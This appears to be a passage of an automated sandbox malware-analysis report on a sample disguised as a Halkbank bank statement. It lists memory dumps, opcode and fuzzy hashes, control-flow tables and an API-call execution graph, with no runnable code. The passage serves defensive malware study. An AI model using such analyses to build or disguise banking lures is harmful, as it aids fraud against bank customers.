                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a8707a18f76d36caee7ac112e3c6b5a2afedd830c38fb7713bc6465eb51c7909
                                                              • Instruction ID: 13b78c6dd67249216ad8d80cd9247bfab1ad4c79e889091634b46bb689ba6dd1
                                                              • Opcode Fuzzy Hash: a8707a18f76d36caee7ac112e3c6b5a2afedd830c38fb7713bc6465eb51c7909
                                                              • Instruction Fuzzy Hash: 20E1F774E00259CFCB14DFA8C580AAEFBF2BF89314F248569E415AB396D730A945CF61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06D4A878 Relevance: .3, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: da03209da8d729e513fd5e1c850a2b4f2fb66850005d1f9543d83724e5b7ec28
                                                              • Instruction ID: ae23cc7df74a8d16639d4d0237050dae2e3b337efa62706fa866363ad6f72b73
                                                              • Opcode Fuzzy Hash: da03209da8d729e513fd5e1c850a2b4f2fb66850005d1f9543d83724e5b7ec28
                                                              • Instruction Fuzzy Hash: 2CD1F871D20B5A8ACB11EB74D990A9DB3B1FF95300F21C79AE10A7B214EB706AC5CF41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0255D424 Relevance: .3, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1979765546.0000000002550000.00000040.00000800.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2550000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7829f9fb79b0b612854f941acaa5b90ad2100ace1208c6bf4e48b0cc9c8f7bc1
                                                              • Instruction ID: 3228c175d190fef7a0795d0f4cfddc03214ed58a4d368fc51dc7de1fcf3c57b6
                                                              • Opcode Fuzzy Hash: 7829f9fb79b0b612854f941acaa5b90ad2100ace1208c6bf4e48b0cc9c8f7bc1
                                                              • Instruction Fuzzy Hash: 80A17E36E002198FCF05DFB4C5505AEBBB2FF86304B15856AED06AB261DB31E916CF40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02700007 Relevance: .2, Instructions: 156COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dc15b00d606d757f262baaef0ab1192f5d90564ba01586f16b4c3f57360aa8b1
                                                              • Instruction ID: c29c6e71c3ae96bdf27abcc747075eead8f256d89673510efc08457578f0e828
                                                              • Opcode Fuzzy Hash: dc15b00d606d757f262baaef0ab1192f5d90564ba01586f16b4c3f57360aa8b1
                                                              • Instruction Fuzzy Hash: 00518074E042598FCB14CFA9C5906AEBBF2BF8A304F24C5AAD458AB356C7305D46CF61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06D40040 Relevance: .1, Instructions: 117COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7f3452d466894f43170f4fed2494b094ab40a6eab55b711bebb855ad151242f7
                                                              • Instruction ID: 14d06d57c331b5193c0f12b55b26c824137e74e99799b2df0a2b5dbe1852aa80
                                                              • Opcode Fuzzy Hash: 7f3452d466894f43170f4fed2494b094ab40a6eab55b711bebb855ad151242f7
                                                              • Instruction Fuzzy Hash: E15194B5D016288FEB68DF2AD95479DBAF3AFC8200F14C1EAC50DA7264DB710A95CF40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06D40006 Relevance: .1, Instructions: 97COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2002157329.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d40000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7cbe7f928a8fc512775f7d6f0cd2239cbe21ec190b83ff0782c31a697706ab5b
                                                              • Instruction ID: 5e7617d2342d8ff2c82943e0f9a1f3fcef3860b6c359ec79994392d27cfd7da3
                                                              • Opcode Fuzzy Hash: 7cbe7f928a8fc512775f7d6f0cd2239cbe21ec190b83ff0782c31a697706ab5b
                                                              • Instruction Fuzzy Hash: A841D9B1D057588FEB69CF6BDC4438ABBF3AFC5200F14C1AAC408AA265DB7509858F51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0270257F Relevance: .0, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 10568f70430fb43e2da622855cd150008c9034bd802824634820919243fe8694
                                                              • Instruction ID: e0ac241b0ca23117b2063a788c2bba7627b96916c9bae99e255752548efaa6dd
                                                              • Opcode Fuzzy Hash: 10568f70430fb43e2da622855cd150008c9034bd802824634820919243fe8694
                                                              • Instruction Fuzzy Hash: 6CE0BF76909214CFC750DF55E8985F8F7B9E74B311F0020A6D90EA7253D7B05549CF44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02702509 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1980040904.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2700000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 74c86a9060a37e25df8461f57b682dc645b6a7949101f579d267fa86e6f69141
                                                              • Instruction ID: fcc71822d48b287a7001dd78ef04d3351a6239c010b43d6c961e92d7272debfe
                                                              • Opcode Fuzzy Hash: 74c86a9060a37e25df8461f57b682dc645b6a7949101f579d267fa86e6f69141
                                                              • Instruction Fuzzy Hash: E3D05EA7D4E2C8CBC7024AB42C681F0BFB89A47121B0820E2CD5E661E3AB055029D259
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:12.4%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:1.5%
                                                              Total number of Nodes:204
                                                              Total number of Limit Nodes:16
                                                              execution_graph 42381 100d3d0 42382 100d3dc 42381->42382 42395 6621de0 42382->42395 42403 6621dd0 42382->42403 42383 100d497 42411 662f518 42383->42411 42418 662f528 42383->42418 42384 100d4f2 42424 6638a58 42384->42424 42429 6638a48 42384->42429 42385 100d5b6 42386 100d611 42385->42386 42434 7a3a60 42385->42434 42438 7a3a50 42385->42438 42396 6621e02 42395->42396 42397 66221e9 42396->42397 42442 66289b0 42396->42442 42446 6628d94 42396->42446 42397->42383 42398 6621ece 42398->42397 42450 662bb70 42398->42450 42457 662bd0b 42398->42457 42405 6621de0 42403->42405 42404 66221e9 42404->42383 42405->42404 42407 66289b0 LdrInitializeThunk 42405->42407 42408 6628d94 LdrInitializeThunk 42405->42408 42406 6621ece 42406->42404 42409 662bb70 4 API calls 42406->42409 42410 662bd0b 4 API calls 42406->42410 42407->42406 42408->42406 42409->42406 42410->42406 42412 662f4fd 42411->42412 42414 662f526 42411->42414 42412->42384 42413 662f929 42413->42384 42414->42413 42415 66289b0 LdrInitializeThunk 42414->42415 42417 662f614 42415->42417 42416 662bb70 LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 42416->42417 42417->42413 42417->42416 42419 662f54a 42418->42419 42420 662f929 42419->42420 42421 66289b0 LdrInitializeThunk 42419->42421 42420->42384 42423 662f614 42421->42423 42422 662bb70 LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 42422->42423 42423->42420 42423->42422 42425 6638a7a 42424->42425 42426 6638b8c 42425->42426 42427 66289b0 LdrInitializeThunk 42425->42427 42428 6628d94 LdrInitializeThunk 42425->42428 42426->42385 42427->42426 42428->42426 42430 6638a7a 42429->42430 42431 6638b8c 42430->42431 42432 66289b0 LdrInitializeThunk 42430->42432 42433 6628d94 LdrInitializeThunk 42430->42433 42431->42385 42432->42431 42433->42431 42435 7a3a6f 42434->42435 42480 7a312c 42435->42480 42439 7a3a54 42438->42439 42440 7a312c 3 API calls 42439->42440 42441 7a3a90 42440->42441 42441->42386 42445 66289e1 42442->42445 42443 6628b41 42443->42398 42444 6628ed1 LdrInitializeThunk 42444->42443 42445->42443 42445->42444 42448 6628c4b 42446->42448 42447 6628ed1 LdrInitializeThunk 42449 6628ee9 42447->42449 42448->42447 42449->42398 42451 662bb97 42450->42451 42452 662bcb3 42451->42452 42464 662bf64 42451->42464 42468 662be18 42451->42468 42472 662be28 42451->42472 42476 662bfc4 42451->42476 42452->42398 42459 662bbcf 42457->42459 42458 662bcb3 42458->42398 42459->42458 42460 662bf64 LdrInitializeThunk 42459->42460 42461 662bfc4 LdrInitializeThunk 42459->42461 42462 662be28 LdrInitializeThunk 42459->42462 42463 662be18 LdrInitializeThunk 42459->42463 42460->42458 42461->42458 42462->42458 42463->42458 42465 662bf43 42464->42465 42466 662be79 LdrInitializeThunk 42465->42466 42467 662be86 42465->42467 42466->42467 42467->42452 42469 662be50 LdrInitializeThunk 42468->42469 42471 662be86 42469->42471 42471->42452 42473 662be50 LdrInitializeThunk 42472->42473 42475 662be86 42473->42475 42475->42452 42477 662bf43 42476->42477 42478 662be86 42476->42478 42477->42478 42479 662be79 LdrInitializeThunk 42477->42479 42478->42452 42479->42478 42481 7a3131 42480->42481 42484 7a4904 42481->42484 42483 7a5416 42483->42483 42486 7a490f 42484->42486 42485 7a5b3c 42485->42483 42486->42485 42489 7a77c8 42486->42489 42494 7a77b9 42486->42494 42491 7a77e9 42489->42491 42490 7a780d 42490->42485 42491->42490 42499 7a7978 42491->42499 42503 7a7969 42491->42503 42495 7a77e9 42494->42495 42496 7a780d 42495->42496 42497 7a7978 3 API calls 42495->42497 42498 7a7969 3 API calls 42495->42498 42496->42485 42497->42496 42498->42496 42500 7a7985 42499->42500 42502 7a79be 42500->42502 42507 7a5f7c 42500->42507 42502->42490 42504 7a7985 42503->42504 42505 7a79be 42504->42505 42506 7a5f7c 3 API calls 42504->42506 42505->42490 42506->42505 42508 7a5f87 42507->42508 42510 7a7a30 42508->42510 42511 7a5fb0 42508->42511 42512 7a5fbb 42511->42512 42518 7a5fc0 42512->42518 42514 7a7a9f 42522 7acea0 42514->42522 42531 7ace9e 42514->42531 42515 7a7ad9 42515->42510 42521 7a5fcb 42518->42521 42519 7a8dc0 42519->42514 42520 7a77c8 3 API calls 42520->42519 42521->42519 42521->42520 42524 7aced1 42522->42524 42526 7acfd1 42522->42526 42523 7acedd 42523->42515 42524->42523 42539 7ad118 42524->42539 42542 7ad108 42524->42542 42525 7acf1d 42546 7ae820 42525->42546 42550 7ae814 42525->42550 42526->42515 42532 7acea0 42531->42532 42534 7acedd 42532->42534 42537 7ad118 2 API calls 42532->42537 42538 7ad108 2 API calls 42532->42538 42533 7acf1d 42535 7ae820 CreateWindowExW 42533->42535 42536 7ae814 CreateWindowExW 42533->42536 42534->42515 42535->42534 42536->42534 42537->42533 42538->42533 42554 7ad158 42539->42554 42540 7ad122 42540->42525 42543 7ad118 42542->42543 42545 7ad158 2 API calls 42543->42545 42544 7ad122 42544->42525 42545->42544 42547 7ae84b 42546->42547 42548 7ae8fa 42547->42548 42562 7af6b0 42547->42562 42551 7ae820 42550->42551 42552 7ae8fa 42551->42552 42553 7af6b0 CreateWindowExW 42551->42553 42553->42552 42555 7ad179 42554->42555 42556 7ad19c 42554->42556 42555->42556 42560 7ad3fb LoadLibraryExW 42555->42560 42561 7ad400 LoadLibraryExW 42555->42561 42556->42540 42557 7ad194 42557->42556 42558 7ad3a0 GetModuleHandleW 42557->42558 42559 7ad3cd 42558->42559 42559->42540 42560->42557 42561->42557 42563 7af689 42562->42563 42563->42562 42564 7af813 CreateWindowExW 42563->42564 42566 7af5c9 42563->42566 42565 7af874 42564->42565 42566->42548 42567 f7d044 42568 f7d05c 42567->42568 42569 f7d0b6 42568->42569 42572 e10548 42568->42572 42578 e10538 42568->42578 42573 e10575 42572->42573 42574 e105a7 42573->42574 42584 e106d0 42573->42584 42589 e106c1 42573->42589 42594 e1079c 42573->42594 42574->42574 42579 e10548 42578->42579 42580 e105a7 42579->42580 42581 e106c1 2 API calls 42579->42581 42582 e106d0 2 API calls 42579->42582 42583 e1079c 2 API calls 42579->42583 42580->42580 42581->42580 42582->42580 42583->42580 42586 e106e4 42584->42586 42585 e10770 42585->42574 42600 e10779 42586->42600 42604 e10788 42586->42604 42591 e106e4 42589->42591 42590 e10770 42590->42574 42592 e10779 2 API calls 42591->42592 42593 e10788 2 API calls 42591->42593 42592->42590 42593->42590 42595 e1075a 42594->42595 42596 e107aa 42594->42596 42598 e10779 2 API calls 42595->42598 42599 e10788 2 API calls 42595->42599 42597 e10770 42597->42574 42598->42597 42599->42597 42601 e10788 42600->42601 42602 e10799 42601->42602 42607 e11bce 42601->42607 42602->42585 42605 e10799 42604->42605 42606 e11bce 2 API calls 42604->42606 42605->42585 42606->42605 42611 e11be0 42607->42611 42615 e11bf0 42607->42615 42608 e11bda 42608->42602 42612 e11c32 42611->42612 42614 e11c39 42611->42614 42613 e11c8a CallWindowProcW 42612->42613 42612->42614 42613->42614 42614->42608 42616 e11c32 42615->42616 42618 e11c39 42615->42618 42617 e11c8a CallWindowProcW 42616->42617 42616->42618 42617->42618 42618->42608 42619 e13db8 42620 e13de0 42619->42620 42623 e13e0c 42619->42623 42621 e13de9 42620->42621 42624 e132fc 42620->42624 42626 e13307 42624->42626 42625 e14103 42625->42623 42626->42625 42628 e13318 42626->42628 42629 e1331d OleInitialize 42628->42629 42631 e1419c 42629->42631 42631->42625 42379 7a4db0 DuplicateHandle 42380 7a4e46 42379->42380

                                                              Executed Functions

                                                              Function 0100B388 Relevance: 6.6, Strings: 5, Instructions: 346COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 855 100b388-100b39b 856 100b3a1-100b3aa 855->856 857 100b4da-100b4e1 855->857 858 100b3b0-100b3b4 856->858 859 100b4e4 856->859 860 100b3b6 858->860 861 100b3ce-100b3d5 858->861 863 100b4e9-100b4f1 859->863 862 100b3b9-100b3c4 860->862 861->857 864 100b3db-100b3e8 861->864 862->859 865 100b3ca-100b3cc 862->865 868 100b4f3 863->868 869 100b4f6-100b510 863->869 864->857 870 100b3ee-100b401 864->870 865->861 865->862 868->869 871 100b512-100b52a 869->871 872 100b53c 869->872 873 100b403 870->873 874 100b406-100b40e 870->874 885 100b533-100b536 871->885 886 100b52c-100b531 871->886 875 100b53e-100b542 872->875 873->874 876 100b410-100b416 874->876 877 100b47b-100b47d 874->877 876->877 880 100b418-100b41e 876->880 877->857 879 100b47f-100b485 877->879 879->857 881 100b487-100b491 879->881 880->863 882 100b424-100b43c 880->882 881->863 884 100b493-100b4ab 881->884 893 100b469-100b46c 882->893 894 100b43e-100b444 882->894 896 100b4d0-100b4d3 884->896 897 100b4ad-100b4b3 884->897 889 100b543-100b580 885->889 890 100b538-100b53a 885->890 886->875 902 100b582 889->902 903 100b587-100b664 call 1003960 call 1003480 889->903 890->871 890->872 893->859 900 100b46e-100b471 893->900 894->863 898 100b44a-100b45e 894->898 896->859 904 100b4d5-100b4d8 896->904 897->863 901 100b4b5-100b4c9 897->901 898->863 908 100b464 898->908 900->859 905 100b473-100b479 900->905 901->863 910 100b4cb 901->910 902->903 919 100b666 903->919 920 100b66b-100b68c call 1004e20 903->920 904->857 904->881 905->876 905->877 908->893 910->896 919->920 922 100b691-100b69c 920->922 923 100b6a3-100b6a7 922->923 924 100b69e 922->924 925 100b6a9-100b6aa 923->925 926 100b6ac-100b6b3 923->926 924->923 927 100b6cb-100b70f 925->927 928 100b6b5 926->928 929 100b6ba-100b6c8 926->929 933 100b775-100b78c 927->933 928->929 929->927 935 100b711-100b727 933->935 936 100b78e-100b7b3 933->936 940 100b751 935->940 941 100b729-100b735 935->941 943 100b7b5-100b7ca 936->943 944 100b7cb 936->944 942 100b757-100b774 940->942 945 100b737-100b73d 941->945 946 100b73f-100b745 941->946 942->933 943->944 949 100b7cc 944->949 947 100b74f 945->947 946->947 947->942 949->949
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                              • API String ID: 0-1229222154
                                                              • Opcode ID: 738d5d0a8de831f690c4b200dbf5a7d1fccc32720e48be0279a0bdbac8e00220
                                                              • Instruction ID: 5f2b562d746c4a7b9efcc5874468c29b6aeba4e969a8d4d19f86b872f582f828
                                                              • Opcode Fuzzy Hash: 738d5d0a8de831f690c4b200dbf5a7d1fccc32720e48be0279a0bdbac8e00220
                                                              • Instruction Fuzzy Hash: 9CE10A75A00218CFEB15DFA9C984A9DBBF1FF48310F1584A9E959AB3A1DB30E941CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0100C1F0 Relevance: 6.4, Strings: 5, Instructions: 190COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 952 100c1f0-100c1f5 953 100c1f7 952->953 954 100c1fa-100c1fc 952->954 953->954 955 100c253-100c304 call 1003960 call 1003480 954->955 956 100c1fe-100c220 954->956 968 100c306 955->968 969 100c30b-100c32c call 1004e20 955->969 957 100c222 956->957 958 100c227-100c251 956->958 957->958 958->955 968->969 971 100c331-100c33c 969->971 972 100c343-100c347 971->972 973 100c33e 971->973 974 100c349-100c34a 972->974 975 100c34c-100c353 972->975 973->972 976 100c36b-100c3af 974->976 977 100c355 975->977 978 100c35a-100c368 975->978 982 100c415-100c42c 976->982 977->978 978->976 984 100c3b1-100c3c7 982->984 985 100c42e-100c453 982->985 989 100c3f1 984->989 990 100c3c9-100c3d5 984->990 992 100c455-100c46a 985->992 993 100c46b 985->993 991 100c3f7-100c414 989->991 994 100c3d7-100c3dd 990->994 995 100c3df-100c3e5 990->995 991->982 992->993 996 100c3ef 994->996 995->996 996->991
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                              • API String ID: 0-1229222154
                                                              • Opcode ID: 788f69a3300f1f10788896c2169eaf61f89df03068958484d34ad4335723bd77
                                                              • Instruction ID: 1a95f9f1521af252468e5512292f75d9611f0d0ae788fa8961a30a5766ac292d
                                                              • Opcode Fuzzy Hash: 788f69a3300f1f10788896c2169eaf61f89df03068958484d34ad4335723bd77
                                                              • Instruction Fuzzy Hash: B491F674E00218CFEB55DFA9D984A9DBBF2BF89300F14C1A9E849AB365DB349941CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0100C7B2 Relevance: 6.4, Strings: 5, Instructions: 189COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1048 100c7b2-100c7b8 1049 100c7ba-100c7e0 1048->1049 1050 100c73d-100c74c 1048->1050 1051 100c7e2 1049->1051 1052 100c7e7-100c82f 1049->1052 1050->1048 1051->1052 1057 100c837-100c846 call 1003960 1052->1057 1060 100c84b-100c8c4 call 1003480 1057->1060 1066 100c8c6 1060->1066 1067 100c8cb-100c8ec call 1004e20 1060->1067 1066->1067 1069 100c8f1-100c8fc 1067->1069 1070 100c903-100c907 1069->1070 1071 100c8fe 1069->1071 1072 100c909-100c90a 1070->1072 1073 100c90c-100c913 1070->1073 1071->1070 1074 100c92b-100c96f 1072->1074 1075 100c915 1073->1075 1076 100c91a-100c928 1073->1076 1080 100c9d5-100c9ec 1074->1080 1075->1076 1076->1074 1082 100c971-100c987 1080->1082 1083 100c9ee-100ca13 1080->1083 1087 100c9b1 1082->1087 1088 100c989-100c995 1082->1088 1092 100ca15-100ca2a 1083->1092 1093 100ca2b 1083->1093 1091 100c9b7-100c9d4 1087->1091 1089 100c997-100c99d 1088->1089 1090 100c99f-100c9a5 1088->1090 1094 100c9af 1089->1094 1090->1094 1091->1080 1092->1093 1094->1091
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                              • API String ID: 0-1229222154
                                                              • Opcode ID: f642f0c69d897d34539e06b363962e908424fc97c83800ccdd107d7174f22294
                                                              • Instruction ID: 5406559f4ee12ec7b48ad9b39fbd17866d9bc84d105c426abe0a1786bf92db5a
                                                              • Opcode Fuzzy Hash: f642f0c69d897d34539e06b363962e908424fc97c83800ccdd107d7174f22294
                                                              • Instruction Fuzzy Hash: 8181E774E00218DFEB58DFA9D984A9DBBF2BF88300F14C1A9E449AB365DB345981CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0100BF10 Relevance: 6.4, Strings: 5, Instructions: 189COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1000 100bf10-100bf11 1001 100bf13 1000->1001 1002 100bf16-100bf19 1000->1002 1001->1002 1003 100bf1b-100bf1c 1002->1003 1004 100bf1e-100bf40 1002->1004 1003->1004 1005 100bf42 1004->1005 1006 100bf47-100c024 call 1003960 call 1003480 1004->1006 1005->1006 1016 100c026 1006->1016 1017 100c02b-100c04c call 1004e20 1006->1017 1016->1017 1019 100c051-100c05c 1017->1019 1020 100c063-100c067 1019->1020 1021 100c05e 1019->1021 1022 100c069-100c06a 1020->1022 1023 100c06c-100c073 1020->1023 1021->1020 1024 100c08b-100c0cf 1022->1024 1025 100c075 1023->1025 1026 100c07a-100c088 1023->1026 1030 100c135-100c14c 1024->1030 1025->1026 1026->1024 1032 100c0d1-100c0e7 1030->1032 1033 100c14e-100c173 1030->1033 1037 100c111 1032->1037 1038 100c0e9-100c0f5 1032->1038 1039 100c175-100c18a 1033->1039 1040 100c18b 1033->1040 1043 100c117-100c134 1037->1043 1041 100c0f7-100c0fd 1038->1041 1042 100c0ff-100c105 1038->1042 1039->1040 1044 100c10f 1041->1044 1042->1044 1043->1030 1044->1043
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                              • API String ID: 0-1229222154
                                                              • Opcode ID: 57aa123b7149f30b9efaa388c2454a57d3a30afa0a123d9b8a607b438c121046
                                                              • Instruction ID: f80859f72b9d7c3bbf21583baaf566d44c9c4df2ca017310099fc4e13b4888f3
                                                              • Opcode Fuzzy Hash: 57aa123b7149f30b9efaa388c2454a57d3a30afa0a123d9b8a607b438c121046
                                                              • Instruction Fuzzy Hash: EE810574E00208DFEB55DFA9C984A9DBBF2BF89300F14C1A9E849AB365DB345981CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0100C4D0 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1143 100c4d0-100c500 1144 100c502 1143->1144 1145 100c507-100c5e4 call 1003960 call 1003480 1143->1145 1144->1145 1155 100c5e6 1145->1155 1156 100c5eb-100c61c call 1004e20 1145->1156 1155->1156 1159 100c623-100c627 1156->1159 1160 100c61e 1156->1160 1161 100c629-100c62a 1159->1161 1162 100c62c-100c633 1159->1162 1160->1159 1163 100c64b-100c68f 1161->1163 1164 100c635 1162->1164 1165 100c63a-100c648 1162->1165 1169 100c6f5-100c70c 1163->1169 1164->1165 1165->1163 1171 100c691-100c6a7 1169->1171 1172 100c70e-100c733 1169->1172 1176 100c6d1 1171->1176 1177 100c6a9-100c6b5 1171->1177 1178 100c735-100c738 1172->1178 1179 100c74b-100c7b8 1172->1179 1182 100c6d7-100c6f4 1176->1182 1180 100c6b7-100c6bd 1177->1180 1181 100c6bf-100c6c5 1177->1181 1183 100c73d-100c74a 1178->1183 1179->1183 1189 100c7ba-100c7e0 1179->1189 1184 100c6cf 1180->1184 1181->1184 1182->1169 1183->1179 1184->1182 1191 100c7e2 1189->1191 1192 100c7e7-100c8c4 call 1003960 call 1003480 1189->1192 1191->1192 1202 100c8c6 1192->1202 1203 100c8cb-100c8ec call 1004e20 1192->1203 1202->1203 1205 100c8f1-100c8fc 1203->1205 1206 100c903-100c907 1205->1206 1207 100c8fe 1205->1207 1208 100c909-100c90a 1206->1208 1209 100c90c-100c913 1206->1209 1207->1206 1210 100c92b-100c96f 1208->1210 1211 100c915 1209->1211 1212 100c91a-100c928 1209->1212 1216 100c9d5-100c9ec 1210->1216 1211->1212 1212->1210 1218 100c971-100c987 1216->1218 1219 100c9ee-100ca13 1216->1219 1223 100c9b1 1218->1223 1224 100c989-100c995 1218->1224 1228 100ca15-100ca2a 1219->1228 1229 100ca2b 1219->1229 1227 100c9b7-100c9d4 1223->1227 1225 100c997-100c99d 1224->1225 1226 100c99f-100c9a5 1224->1226 1230 100c9af 1225->1230 1226->1230 1227->1216 1228->1229 1230->1227
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                              • API String ID: 0-1229222154
                                                              • Opcode ID: edbbda591947040e162ca4b6b4350381c81accb17a61dd4291e4d44a71a5ca4d
                                                              • Instruction ID: 0f61b379060174865b0215901b079eb1594b44d19d42cd24e38165c6435b7ec6
                                                              • Opcode Fuzzy Hash: edbbda591947040e162ca4b6b4350381c81accb17a61dd4291e4d44a71a5ca4d
                                                              • Instruction Fuzzy Hash: 4E81E874E00218CFEB54DFA9D984A9DBBF2BF88300F14D1A9E449AB365DB346941CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01004B31 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
